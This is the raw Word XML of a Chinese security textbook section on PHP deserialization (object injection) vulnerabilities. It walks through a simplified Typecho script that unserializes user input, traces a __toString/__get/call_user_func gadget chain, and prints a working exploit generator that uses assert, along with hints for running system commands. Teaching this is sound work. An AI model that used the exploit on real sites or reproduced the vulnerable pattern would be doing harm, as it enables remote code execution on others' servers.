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300" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc81314624"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PHP反序列化漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>PHP反序列化漏洞又叫PHP对象注入漏洞。在一个应用中，如果传给unserialize()的参数是用户可控的，那么攻击者就可以通过传入一个精心构造的序列化字符串，利用PHP魔术方法来控制对象内部的变量甚至是函数。对这一类漏洞的利用，往往需要分析web应用的源代码。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下面是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>笔者从一个现实场景中精简</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>的实例，我们将结合这个实例理解反序列化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>如何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>对其进行利用。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665" w:type="dxa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/*typecho.php*/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&lt;?php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class Typecho_Db{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public function __construct($adapterName){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$adapterName = 'Typecho_Db_Adapter_' . $adapterName;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class Typecho_Feed{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private $item;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public function __toString(){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$this-&gt;item['author']-&gt;screenName;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class Typecho_Request{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private $_params = array();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private $_filter = array();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public function __get($key)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return $this-&gt;get($key);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public function get($key, $default = NULL)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switch (true) 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case isset($this-&gt;_params[$key]):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$value = $this-&gt;_params[$key];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break;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default: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$value = $default;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break;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$value = !is_array($value) &amp;&amp; strlen($value) &gt; 0 ? $value : $default;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return $this-&gt;_applyFilter($value);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private function _applyFilter($value)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if ($this-&gt;_filter) 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foreach ($this-&gt;_filter as $filter) {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$value = is_array($value) ? array_map($filter, $value) :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call_user_func($filter, $value);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$this-&gt;_filter = array();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return $value;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$config = unserialize(base64_decode($_GET['__typecho_config']));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$db = new Typecho_Db($config['adapter']);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?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto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该web应用通过$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>_GET[‘__typecho_config’]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">从用户处获取了反序列化的对象，满足反序列化漏洞的基本条件，unserialize()的参数可控，这里是漏洞的入口点。 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接下来，程序实例化了类Ty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pecho_Db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>，类的参数是通过反序列化得到的$config。在类Typecho_Db的构造函数中，进行了字符串拼接的操作，而在PHP魔术方法中，如果一个类</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>被当做字符串处理，那么类中的__toString()方法将会被调用。全局搜索，发现类Typecho_Feed中存在__toString()方法。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在类Typecho_Fee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>的__toString()方法中，会访问类中私有变量$item[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>‘author’]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>中的screenName，这里又有一个PHP反序列化的知识点，如果$item[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>‘author’]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>是一个对象，并且该对象没有screenName属性，那么这个对象中的__get()，方法将会被调用，在Typecho_Request类中，正好定义了__get()方法。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类Typecho_Request中的__get()方法会返回get()，get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>中调用了_applyFilter()方法，而在_applyFilter()中，使用了PHP的call_user_function()函数，其第一个参数是被调用的函数，第二个参数是被调用的函数的参数，在这里$filter，$value都是我们可以控制的，因此可以用来执行任意系统命令。至此，一条完整的利用链构造成功。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根据上述思路，写出对应的利用代码：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665" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto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/*exp.php*/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&lt;?php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Typecho_Feed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private $item;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public function __construct(){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$this-&gt;item = array(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'author' =&gt; new Typecho_Request(),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);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class Typecho_Request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private $_params = array();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private $_filter = array();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public function __construct(){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$this-&gt;_params['screenName'] = 'phpinfo()';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$this-&gt;_filter[0] = 'assert';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$exp = array(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'adapter' =&gt; new Typecho_Feed()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echo base64_encode(serialize($exp));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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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上述代码中用到了PHP的assert()函数，如果该函数的参数是字符串，那么该字符串会被assert()当做PHP代码执行，这一点和PHP一句话木马常用的eval()函数有相似之处。phpinfo();便是我们执行的PHP代码，如果想要执行系统命令，将phpinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>替换为system(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>‘ls’);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>即可，注意最后有一个分号。如果想要创建一个文件，可以如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="800" w:firstLineChars="400"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$this-&gt;_params['screenName'] = 'fopen(\'newfile.txt\', \'w\');';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        $this-&gt;_filter[0] = 'assert';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访问exp.php便可以获得payload，通过get请求的方式传递给typecho.php后，phpinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>成功执行，如图12-7。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0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35"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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12-7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phpinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>成功执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="Wingdings"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="Wingdings"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>实验二：复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>本节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="Wingdings"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>的反序列化漏洞，并执行其他的系统命令。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223D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64C223D6"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="12.2.%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr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F350D6"/>
    <w:rsid w:val="00A63801"/>
    <w:rsid w:val="00F350D6"/>
    <w:rsid w:val="120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新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体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 w:eastAsia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4"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="6">
    <w:name w:val="标题 3 Char"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32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930</Words>
  <Characters>2496</Characters>
  <Lines>21</Lines>
  <Paragraphs>6</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2992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2022-05-30T11:03:00Z</dcterms:created>
  <dc:creator>j zhang</dc:creator>
  <cp:lastModifiedBy>微信用户</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-10T17:39:55Z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F7D0337E57144644B35671294AE0A3DB_12</vt:lpwstr>
  </property>
</Properties>
</file>